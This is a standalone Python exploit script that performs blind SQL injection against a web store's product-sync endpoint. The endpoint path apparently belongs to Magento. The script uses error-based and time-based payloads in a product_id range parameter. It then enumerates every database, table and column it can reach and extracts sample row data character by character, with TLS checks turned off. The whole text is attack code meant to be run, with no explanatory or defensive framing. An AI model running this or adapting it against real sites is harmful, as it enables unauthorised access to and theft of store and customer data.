#!/usr/bin/env python3 import requests import string import binascii import sys import time requests.packages.urllib3.disable_warnings() class ExploitError(Exception): pass class Browser: PROXY = None def __init__(self, url): self.url = url.rstrip('/') self.s = requests.Session() self.s.verify = False if self.PROXY: self.s.proxies = {'http': self.PROXY, 'https': self.PROXY} class SQLInjection(Browser): def encode(self, s: str) -> str: return '0x' + binascii.b2a_hex(s.encode()).decode() def find_test_method(self): for m in (self.test_error, self.test_timebased): if m('123=123') and not m('123=124'): self.test = m return raise ExploitError('No reliable injection test method found') def test_error(self, condition: str) -> bool: payload = f"))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE {condition}) -- -" r = self.s.get( f"{self.url}/catalog/product_frontend_action/synchronize", params={ 'type_id': 'recently_products', 'ids[0][added_at]': '', 'ids[0][product_id][from]': '?', 'ids[0][product_id][to]': payload } ) return r.status_code == 400 def test_timebased(self, condition: str) -> bool: payload = f"))) OR (SELECT*FROM (SELECT SLEEP(IF({condition},2,0)))a) -- -" start = time.time() self.s.get( f"{self.url}/catalog/product_frontend_action/synchronize", params={ 'type_id': 'recently_products', 'ids[0][added_at]': '', 'ids[0][product_id][from]': '?', 'ids[0][product_id][to]': payload } ) return (time.time() - start) > 1.5 def get_length(self, label: str, expr: str) -> int: for i in range(1, 100): condition = f"LENGTH({expr})={i}" if self.test(condition): print(f"[+] {label} length = {i}") return i raise ExploitError(f"Failed to determine length of {label}") def word(self, label: str, sql_expr: str, size: int = None, charset: str = None) -> str: if charset is None: charset = string.ascii_letters + string.digits + '_-:.@#$%&*()' if size is None: try: size = self.get_length(label, sql_expr) except ExploitError: print(f"[!] Skipping {label}, unable to determine length") return '' result = '' for pos in range(1, size + 1): found = False for c in charset: condition = f"ASCII(SUBSTRING(({sql_expr}),{pos},1))={ord(c)}" if self.test(condition): result += c print(f"{label} => {result}", end='\r') found = True break if not found: result += '?' print(f"[!] Failed to resolve char at pos {pos} for {label}") print() return result def get_current_db(self): return self.word("Current DB", "DATABASE()") def get_databases(self, limit=10, current_first=True): dbs = [] current = self.get_current_db() if current_first else None for i in range(limit): expr = f"(SELECT schema_name FROM information_schema.schemata LIMIT {i},1)" db = self.word(f"DB#{i+1}", expr) if db and db != current: dbs.append(db) return [current] + dbs if current else dbs def get_tables(self, db: str, limit: int = 10) -> list: tables = [] for i in range(limit): expr = f"(SELECT table_name FROM information_schema.tables WHERE table_schema={self.encode(db)} LIMIT {i},1)" tbl = self.word(f"Table#{i+1}", expr) if tbl: tables.append(tbl) return tables def get_columns(self, db: str, table: str, limit: int = 10) -> list: cols = [] for i in range(limit): expr = f"(SELECT column_name FROM information_schema.columns WHERE table_schema={self.encode(db)} AND table_name={self.encode(table)} LIMIT {i},1)" col = self.word(f"Col#{i+1}", expr) if col: cols.append(col) return cols def get_data(self, db: str, table: str, column: str, limit: int = 5) -> list: rows = [] for i in range(limit): expr = f"(SELECT {column} FROM {db}.{table} LIMIT {i},1)" try: val = self.word(f"{column}@{i}", expr, charset=string.printable.replace('%','').replace("'", "")) if val: rows.append(val) except ExploitError as e: print(f"[!] Skipping row {i} due to error: {e}") continue return rows def run(url): sqli = SQLInjection(url) try: sqli.find_test_method() print("[+] Injection test method detected!") dbs = sqli.get_databases(limit=10) print(f"[+] Databases: {dbs}\n") for db in dbs: print(f"[>] Enumerating DB: {db}") tables = sqli.get_tables(db) print(f"[+] Tables: {tables}") for table in tables: cols = sqli.get_columns(db, table) print(f"[+] Columns in {table}: {cols}") for col in cols: data = sqli.get_data(db, table, col) print(f"[+] Sample data from {table}.{col}: {data}") except ExploitError as e: print(f"Error: {e}") if __name__ == '__main__': if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} ") sys.exit(1) run(sys.argv[1])